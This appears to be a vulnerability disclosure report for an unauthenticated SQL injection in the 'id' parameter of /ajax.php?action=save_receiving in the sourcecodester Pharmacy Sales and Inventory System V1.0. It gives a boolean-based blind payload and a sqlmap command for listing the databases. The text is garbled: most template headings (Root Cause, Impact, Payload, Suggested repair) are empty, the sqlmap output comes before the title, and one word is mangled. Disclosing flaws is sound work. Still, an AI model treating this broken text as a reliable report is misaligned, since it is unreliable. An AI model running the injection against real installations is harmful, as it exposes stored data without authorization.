---
Parameter: id (POST)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: id=(SELECT (CASE WHEN (4784=4784) THEN 5 ELSE (SELECT 7976 UNION SELECT 3350) END))
---
python sqlmap.py -r 1.txt --batch --dbs
sourcecodester Pharmacy Sales and Inventory System Project V1.0 /ajax.php?action=save_receiving SQL injection
NAME OF AFFECTED PRODUCT(S)
Pharmacy Sales and Inventory System
Vendor Homepage
AFFECTED AND/OR FIXED VERSION(S)
submitter
Vulnerable File
VERSION(S)
Software Link
PROBLEM TYPE
Vulnerability Type
Root Cause
Impact
DESCRIPTION
No login or authorization is required to exploit this vulnerability
Vulnerability details and POC
Vulnerability lonameion:
Payload:
The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
Suggested repair